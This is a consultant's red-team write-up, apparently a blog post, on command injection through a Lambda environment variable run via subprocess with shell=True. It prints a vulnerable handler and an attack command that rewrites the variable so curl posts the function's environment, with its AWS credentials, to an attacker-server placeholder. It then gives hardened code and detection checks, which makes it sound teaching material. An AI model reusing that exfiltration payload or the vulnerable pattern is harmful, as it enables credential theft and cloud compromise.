This particular engagement was a red team exercise for a client in the FinTech space – let's call them "SecurePay." SecurePay handled millions of daily transactions, processing sensitive financial data, and their infrastructure was almost entirely serverless on AWS. My team at TheDevDude was brought in to stress-test their defenses, specifically focusing on their core payment processing pipeline. The stakes couldn't have been higher; a breach here meant not just financial loss but catastrophic reputational damage and regulatory fines.
The specific target that caught our eye was a critical AWS Lambda function, let's call it TransactionProcessorLambda. This function was the heart of their real-time transaction validation and routing system. It was written in Python, triggered by an API Gateway endpoint, and interacted heavily with DynamoDB for transaction records, S3 for audit logs, and an internal Kafka cluster for asynchronous processing. The tech stack was pretty standard for a modern serverless application: AWS Lambda, API Gateway, DynamoDB, S3, KMS, and a smattering of other services orchestrated via AWS SAM (Serverless Application Model).
The business context was crucial: this Lambda function was responsible for validating incoming payment requests, applying business logic, and then securely forwarding them to various banking partners. Any disruption or compromise of this function meant transactions would halt, or worse, could be manipulated. It was a high-throughput, low-latency component, designed for resilience and speed. The developers had focused heavily on performance and functional correctness, as is often the case, sometimes overlooking the subtle security implications of certain design choices. I remember thinking, "This reminds me of some of the early challenges we faced at Website Factory when we were trying to balance rapid deployment with robust security for our client's e-commerce platforms." The pressure to deliver features often overshadows the meticulous review of every configuration detail, especially when it comes to environment variables, which are often seen as 'just configuration'.
Our goal was to achieve remote code execution (RCE) within this critical function, demonstrating the ability to exfiltrate data, manipulate transactions, or pivot further into their AWS environment. The initial reconnaissance revealed a complex web of IAM roles and permissions, but one particular detail in the Lambda's configuration caught our attention during an enumeration phase: a seemingly benign environment variable.
The class of bug we exploited here is a classic Command Injection, but with a twist: the injection vector wasn't direct user input from an HTTP request body or query parameter. Instead, it was an environment variable. This is a subtle but incredibly dangerous vulnerability, especially in serverless environments where environment variables are a primary mechanism for configuration and often assumed to be "safe" or static.
The vulnerability arose because the TransactionProcessorLambda used an environment variable, let's call it VALIDATION_SCRIPT_PATH, to dynamically construct and execute a shell command. The intention was to allow operations teams to easily switch between different validation scripts without redeploying the Lambda code. A noble goal, but implemented insecurely. Instead of just being a path, the variable was used as a direct prefix to a command executed via Python's subprocess.run() function with shell=True. This is a critical mistake. When shell=True is used, the command string is passed directly to the shell (e.g., /bin/sh -c "your command here"), allowing for shell metacharacter injection.
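To make that difference concrete, here is a minimal sketch that uses a harmless `echo` payload in place of anything malicious. The variable names are mine, not SecurePay's, and it assumes a POSIX system where `/bin/sh` and an `echo` executable are available.

```python
import subprocess

# Hypothetical, harmless stand-in for an attacker-controlled value.
prefix = "echo validated; echo INJECTED"

# shell=True: the string is handed to /bin/sh -c, so ';' starts a second command.
via_shell = subprocess.run(prefix, shell=True, capture_output=True, text=True)

# List form: no shell is involved; ';' is just a character inside one argument.
via_list = subprocess.run(["echo", "validated; echo INJECTED"],
                          capture_output=True, text=True)

print(via_shell.stdout)  # two lines: the second command ran
print(via_list.stdout)   # one line: the text was echoed literally
```

The same bytes produce two commands in the first call and a single literal argument in the second, which is the whole vulnerability in miniature.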
Developers often miss this because:
- They assume environment variables are controlled by trusted parties (which they are, until an attacker gains the ability to modify them).
- They focus on sanitizing direct user input, overlooking indirect input sources like configuration files or environment variables.
- There's a misunderstanding of how subprocess.run() (or similar functions in other languages like Node.js's child_process.exec()) behaves with and without shell=True. The convenience of shell=True often masks its inherent dangers.
- Lack of security-focused code reviews or automated static analysis tools that specifically flag dynamic command construction from environment variables.
This vulnerability maps directly to OWASP Top 10 A03:2021 - Injection and, because the injected payload is interpreted by /bin/sh, to MITRE ATT&CK T1059.004 (Command and Scripting Interpreter: Unix Shell). The ability to modify Lambda environment variables, even if initially requiring a separate privilege escalation, is a common target for attackers because, in code like this, it offers a direct path to RCE.
Here's a comparison of the vulnerable versus a hardened configuration approach:
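| | Vulnerable Configuration | Hardened Configuration |
|---|---|---|
| Environment variable(s) | `VALIDATION_SCRIPT_PATH="/usr/bin/python /opt/validation_logic.py"` (a whole command prefix in one string) | `VALIDATION_SCRIPT="/usr/bin/python"` and `VALIDATION_ARGS="/opt/validation_logic.py"` (executable and arguments kept separate) |
| Lambda code snippet | `subprocess.run(full_command, shell=True, capture_output=True, text=True, check=True)` | `subprocess.run(command_list, capture_output=True, text=True, check=True)` |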
The key takeaway here is that any time you're dynamically constructing commands, whether from user input, configuration files, or environment variables, you must treat it as untrusted input and apply rigorous sanitization or, even better, use API calls that don't involve a shell, like passing arguments as a list to subprocess.run().
Let's assume the vulnerable Python Lambda code looked something like this:
    # transaction_processor.py
    import os
    import subprocess
    import json


    def lambda_handler(event, context):
        # Retrieve the command prefix from environment variables
        # This is the critical vulnerability point
        command_prefix = os.environ.get("VALIDATION_SCRIPT_PATH", "/usr/bin/python /opt/validation_logic.py")

        # Assume 'event' contains transaction data that needs validation
        transaction_data = json.loads(event['body'])
        transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')

        # Construct the full command. The vulnerability is that command_prefix
        # is treated as part of the shell command, not just a path.
        full_command = f"{command_prefix} --transaction-id {transaction_id}"
        print(f"Executing validation command: {full_command}")

        try:
            # DANGER: shell=True allows command injection via command_prefix
            result = subprocess.run(full_command, shell=True, capture_output=True, text=True, check=True)
            print(f"Validation output: {result.stdout}")
            return {
                'statusCode': 200,
                'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
            }
        except subprocess.CalledProcessError as e:
            print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
            }
        except Exception as e:
            print(f"An unexpected error occurred: {e}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
            }
The default VALIDATION_SCRIPT_PATH was set to /usr/bin/python /opt/validation_logic.py. The developers intended for this to be a fixed script execution. However, because shell=True was used, any shell metacharacters in the command_prefix would be interpreted by the shell.
Our initial foothold wasn't directly on the Lambda function. We had identified a misconfigured CI/CD pipeline that, through a series of chained permissions, allowed us to assume an IAM role with lambda:UpdateFunctionConfiguration permissions for the TransactionProcessorLambda. This was our golden ticket. With these permissions, we could modify the Lambda's environment variables.
Our goal was to achieve RCE. We decided to demonstrate this by exfiltrating sensitive environment variables (which often contain AWS credentials for the Lambda's execution role) to an attacker-controlled server. First, we needed to modify the VALIDATION_SCRIPT_PATH environment variable. We used the AWS CLI for this, assuming we had the necessary IAM permissions:
    # Step 1: Modify the Lambda's environment variable
    # The payload injects a new command using shell metacharacters (;)
    # It then uses curl to send the Lambda's environment variables to our listener.
    # The original script still runs first to avoid immediate suspicion,
    # though the added curl call could still cause a timeout or error.
    # The inner double quotes and $(env) are backslash-escaped so they reach the
    # Lambda unexpanded instead of being evaluated by the local shell.
    ATTACKER_SERVER="http://your-attacker-ip:8000"
    LAMBDA_NAME="TransactionProcessorLambda"
    aws lambda update-function-configuration \
      --function-name "${LAMBDA_NAME}" \
      --environment "Variables={VALIDATION_SCRIPT_PATH='/usr/bin/python /opt/validation_logic.py; curl -X POST -d \"\$(env)\" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '}"
Let's break down that payload for VALIDATION_SCRIPT_PATH:

    '/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '

- `/usr/bin/python /opt/validation_logic.py`: This is the original, legitimate part of the command.
- `;`: This is the critical shell metacharacter. It separates the legitimate command from our injected command. The shell will execute the first command, then the second.
- `curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil`: This is our injected command.
  - `curl -X POST`: Initiates an HTTP POST request.
  - `-d "$(env)"`: The `$(env)` command substitution executes the `env` command (which lists all environment variables) and captures its output. This output is then sent as the data body of the POST request.
  - `${ATTACKER_SERVER}/exfil`: Our controlled server endpoint where we're listening for exfiltrated data.
- `; echo 'Injection successful'`: Another command separator, followed by a simple echo. This helps ensure the shell command completes, even if the curl fails, and provides a small indicator in the Lambda logs if we were monitoring them. The final single quote closes the string.
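The structure of that payload can be replayed safely. In this sketch, which is my own stand-in and not the engagement payload, `printf` plays the role of `env` and `echo` plays the role of `curl`, so nothing leaves the machine. It assumes a POSIX `/bin/sh`.

```python
import subprocess

# Harmless stand-in for the injected VALIDATION_SCRIPT_PATH value:
# 'printf' replaces 'env', and 'echo' replaces the outbound 'curl'.
command_prefix = (
    "echo original-script-ran; "
    'echo "would send: $(printf SECRET=demo)"; '
    "echo 'Injection successful'"
)
transaction_id = "TXN12345"

# Same string construction as the vulnerable handler.
full_command = f"{command_prefix} --transaction-id {transaction_id}"

result = subprocess.run(full_command, shell=True, capture_output=True, text=True)
for line in result.stdout.splitlines():
    print(line)
# original-script-ran
# would send: SECRET=demo
# Injection successful --transaction-id TXN12345
```

Notice where the handler's appended `--transaction-id` ends up: it becomes an argument to the trailing `echo`, so the legitimate script at the front of the chain runs without it.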
After updating the environment variable, we simply needed to trigger the Lambda function. Since it was exposed via API Gateway, a simple HTTP POST request to its endpoint was sufficient:
    # Step 2: Trigger the Lambda function (e.g., via API Gateway)
    # This would be a normal transaction request from a client application.
    API_GATEWAY_URL="https://your-api-gateway-id.execute-api.us-east-1.amazonaws.com/prod/transactions"
    curl -X POST -H "Content-Type: application/json" \
      -d '{"transaction_id": "TXN12345", "amount": 100.00, "currency": "USD"}' \
      "${API_GATEWAY_URL}"
On our attacker-controlled server (listening on port 8000), we immediately received an incoming POST request containing all of the Lambda's environment variables, including the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN for the Lambda's execution role. These temporary credentials granted us full programmatic access to whatever resources the Lambda's role had permissions for – which, in this case, was extensive, including DynamoDB, S3, and even some internal network access.
This was a critical RCE. With these credentials, we could have:
- Read, modified, or deleted transaction data from DynamoDB.
- Accessed sensitive audit logs from S3.
- Pivoted to other AWS services or even internal networks if the role had appropriate permissions.
- Deployed further malicious code or backdoors.
The impact was immediate and severe, demonstrating a complete compromise of the core payment processing function.
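The dump was that rich because a child process inherits its parent's environment by default, and the Lambda runtime exposes the execution role's temporary credentials as environment variables. As a compensating control, the child can be started with an explicit, minimal environment through the `env` parameter of `subprocess.run`. The sketch below uses a placeholder value and a made-up `minimal_env`; it assumes a POSIX system where the interpreter starts with only `PATH` set.

```python
import os
import subprocess
import sys

# Placeholder standing in for the credentials the Lambda runtime injects.
os.environ["AWS_SECRET_ACCESS_KEY"] = "placeholder-not-a-real-secret"

# Child code that reports whether it can see the variable.
probe = "import os; print('AWS_SECRET_ACCESS_KEY' in os.environ)"

# Default behaviour: the child inherits the full parent environment.
inherited = subprocess.run([sys.executable, "-c", probe],
                           capture_output=True, text=True)

# Explicit minimal environment: only what the child needs to run.
minimal_env = {"PATH": os.environ.get("PATH", "/usr/bin:/bin")}
scrubbed = subprocess.run([sys.executable, "-c", probe], env=minimal_env,
                          capture_output=True, text=True)

print(inherited.stdout.strip())  # True
print(scrubbed.stdout.strip())   # False
```

This only narrows what a hijacked child process sees by default. It is not a substitute for removing the injection itself.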
Remediating this vulnerability requires a multi-layered approach, focusing on secure coding practices, least privilege, and robust configuration management. The primary fix is to eliminate the use of shell=True with dynamically constructed commands and to separate command arguments from the command itself.
Beyond this specific code fix, a comprehensive hardening blueprint would also include:
- Least Privilege IAM: Ensure the Lambda's execution role has only the absolute minimum permissions required. For instance, it shouldn't have lambda:UpdateFunctionConfiguration, and any other principal that does hold it (such as the CI/CD role we abused) should be scoped just as tightly.
- Input Validation: Even if environment variables are "trusted," always validate and sanitize any data derived from them, especially if it influences command execution or file paths.
- Static Application Security Testing (SAST): Integrate SAST tools into the CI/CD pipeline to automatically detect patterns like subprocess.run(..., shell=True) or dynamic command construction.
- Runtime Application Self-Protection (RASP): Consider RASP solutions for critical functions to detect and block malicious command execution attempts at runtime.
- Regular Security Audits: Periodically review Lambda configurations, environment variables, and IAM policies.
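To give a feel for what the SAST item looks like in practice, here is a toy check built on Python's standard `ast` module. It is a sketch, not a replacement for an established tool (Bandit, for example, already ships a rule for this pattern); the function name `find_shell_true_calls` is my own, and it only catches the literal keyword `shell=True`.

```python
import ast


def find_shell_true_calls(source: str) -> list:
    """Return line numbers of calls that pass the literal keyword shell=True."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        for kw in node.keywords:
            if (kw.arg == "shell"
                    and isinstance(kw.value, ast.Constant)
                    and kw.value.value is True):
                hits.append(node.lineno)
    return sorted(hits)


sample = '''import subprocess
subprocess.run(cmd, shell=True)
subprocess.run(["ls", "-l"])
subprocess.Popen(cmd, shell=False)
'''
print(find_shell_true_calls(sample))  # [2]
```

A check like this would miss `shell=some_variable` or a wrapper function that sets the flag internally, which is one reason to lean on a maintained tool for real pipelines.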
Here's how the Lambda code and environment variables should be configured:
    # transaction_processor_hardened.py
    import os
    import subprocess
    import json
    import shlex  # For safe splitting of shell-like strings


    def lambda_handler(event, context):
        # Retrieve the script path and arguments separately
        # No longer a single 'command_prefix' that can be injected
        script_path = os.environ.get("VALIDATION_SCRIPT", "/usr/bin/python")
        script_args_str = os.environ.get("VALIDATION_ARGS", "/opt/validation_logic.py")  # Default arguments

        # Assume 'event' contains transaction data that needs validation
        transaction_data = json.loads(event['body'])
        # Coerce to str: subprocess arguments must be strings, and JSON may carry a number
        transaction_id = str(transaction_data.get('transaction_id', 'UNKNOWN'))

        # Safely parse arguments using shlex.split() if they are expected to be shell-like
        # For truly fixed arguments, a simple list is better.
        # Here, we assume VALIDATION_ARGS might contain multiple arguments.
        try:
            script_args = shlex.split(script_args_str)
        except ValueError as e:
            print(f"Error parsing VALIDATION_ARGS: {e}. Using default.")
            script_args = ["/opt/validation_logic.py"]  # Fallback to a safe default

        # Construct the full command as a list of arguments
        # This is crucial: subprocess.run with a list does NOT invoke a shell.
        command_list = [script_path] + script_args + ["--transaction-id", transaction_id]
        print(f"Executing validation command: {' '.join(command_list)}")

        try:
            # SAFE: shell=False (default) when passing a list of arguments
            result = subprocess.run(command_list, capture_output=True, text=True, check=True)
            print(f"Validation output: {result.stdout}")
            return {
                'statusCode': 200,
                'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
            }
        except subprocess.CalledProcessError as e:
            print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
            }
        except Exception as e:
            print(f"An unexpected error occurred: {e}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
            }
And the corresponding environment variables:
    # Hardened Environment Variables
    VALIDATION_SCRIPT="/usr/bin/python"
    VALIDATION_ARGS="/opt/validation_logic.py"  # Arguments for the script
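This approach ensures that the script path and its arguments are treated as distinct elements, preventing shell metacharacter injection. The shlex.split() function is used to safely parse the arguments string into a list, but even better is to provide arguments as separate environment variables if possible, or hardcode them if they are truly static. Keep in mind that dropping the shell only removes metacharacter interpretation: anyone who can still edit these variables can point VALIDATION_SCRIPT at a different executable, so the configured values should also be checked against an allowlist of expected paths.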
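Since the variables still decide what gets executed, one option is to pin the interpreter in code and let configuration choose only among known scripts. The following is a sketch under my own assumptions: the variable name `VALIDATION_SCRIPT_FILE`, the second script path, and both helper functions are hypothetical and not part of SecurePay's code.

```python
import os

# Hypothetical allowlist: script paths that ship inside the deployment package.
ALLOWED_SCRIPTS = {
    "/opt/validation_logic.py",
    "/opt/validation_logic_v2.py",
}
DEFAULT_SCRIPT = "/opt/validation_logic.py"


def resolve_validation_script(env=os.environ) -> str:
    """Return the configured script only if it is on the allowlist."""
    candidate = env.get("VALIDATION_SCRIPT_FILE", DEFAULT_SCRIPT)
    # Normalise so '/opt/../bin/sh' style values cannot sneak past the check.
    normalised = os.path.normpath(candidate)
    if normalised not in ALLOWED_SCRIPTS:
        raise ValueError(f"Refusing unlisted validation script: {candidate!r}")
    return normalised


def build_command(transaction_id, env=os.environ) -> list:
    # The interpreter is fixed in code; only the script choice is configurable.
    return ["/usr/bin/python", resolve_validation_script(env),
            "--transaction-id", str(transaction_id)]


print(build_command("TXN12345", {"VALIDATION_SCRIPT_FILE": "/opt/validation_logic_v2.py"}))
```

Operations can still switch validation scripts without a redeploy, which was the original goal, but a value such as `/bin/sh` is rejected before anything runs.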
This incident, like many others I've encountered over the years, hammered home some critical lessons that often get overlooked in the rush of development:
- Environment Variables Are Not Inherently Safe: Trust me, my friends, this is a common misconception. Developers often treat environment variables as a secure, static configuration. But if an attacker gains the ability to modify them (which is a common privilege escalation target), they become a potent vector for injection, RCE, or data exfiltration. Always treat them as potentially untrusted input, especially if they influence command execution.
- shell=True is a Red Flag: Any time you see shell=True in Python's subprocess module (or similar constructs in other languages), your security alarms should be blaring. It's almost always a shortcut that introduces significant risk. It means you're handing control to the underlying shell, which will happily interpret any metacharacters an attacker might inject. Prefer passing commands as a list of arguments.
- The Chain is Only as Strong as its Weakest Link: Our RCE wasn't a direct hit on the Lambda. It was a chain: a misconfigured CI/CD pipeline led to IAM privilege escalation, which then allowed us to modify the Lambda's environment. Security isn't just about individual components; it's about the entire ecosystem and how they interact. A seemingly minor misconfiguration in one place can unlock critical vulnerabilities elsewhere.
- Security by Design, Not by Afterthought: This vulnerability could have been avoided if the design principle of "never trust input" (even configuration input) was applied from the outset. Building security in from the ground up, rather than trying to bolt it on later, is always more effective and less costly. This includes threat modeling, secure code reviews, and automated security testing throughout the development lifecycle.
- Assume Compromise: Even with the best defenses, assume an attacker might eventually gain some level of access. This mindset drives you to implement compensating controls like least privilege IAM roles, network segmentation, and robust logging/monitoring, so that even if one component is compromised, the blast radius is minimized and the attack is detected quickly.
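On the monitoring side of "assume compromise," a change to a function's environment is exactly the kind of event worth alerting on. The sketch below filters audit records for it. The record layout (`eventSource`, `eventName`, `requestParameters.environment`) is an assumption modelled on CloudTrail management events, and the sample records are made up, so verify the field names against real logs before relying on it.

```python
def is_lambda_env_change(record: dict) -> bool:
    """Flag audit records that update a Lambda function's environment."""
    if record.get("eventSource") != "lambda.amazonaws.com":
        return False
    # Lambda event names carry an API version suffix in CloudTrail,
    # so match on the prefix rather than an exact string.
    if not record.get("eventName", "").startswith("UpdateFunctionConfiguration"):
        return False
    params = record.get("requestParameters") or {}
    return "environment" in params


# Made-up sample records for illustration only.
records = [
    {"eventSource": "lambda.amazonaws.com",
     "eventName": "UpdateFunctionConfiguration20150331v2",
     "requestParameters": {"functionName": "TransactionProcessorLambda",
                           "environment": {}}},
    {"eventSource": "lambda.amazonaws.com",
     "eventName": "GetFunction20150331v2",
     "requestParameters": {"functionName": "TransactionProcessorLambda"}},
]

flagged = [r["requestParameters"]["functionName"]
           for r in records if is_lambda_env_change(r)]
print(flagged)  # ['TransactionProcessorLambda']
```

In a real deployment this logic would more likely live in an event rule or SIEM query than in a script, but the condition being matched is the same.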
This was a critical finding, but it was also a fantastic learning opportunity for the client. It reinforced the importance of looking beyond the obvious attack vectors and understanding the subtle ways configuration choices can lead to catastrophic outcomes. If you're grappling with similar challenges in your cloud environments or want to dive deeper into these kinds of real-world attack scenarios, don't hesitate to reach out. I offer personalized security mentorship sessions and consulting. You can book a 1-on-1 with me, Debasis Bhattacharjee, at thedevdude.com or learnwithdeb.com. Let's secure the digital frontier together.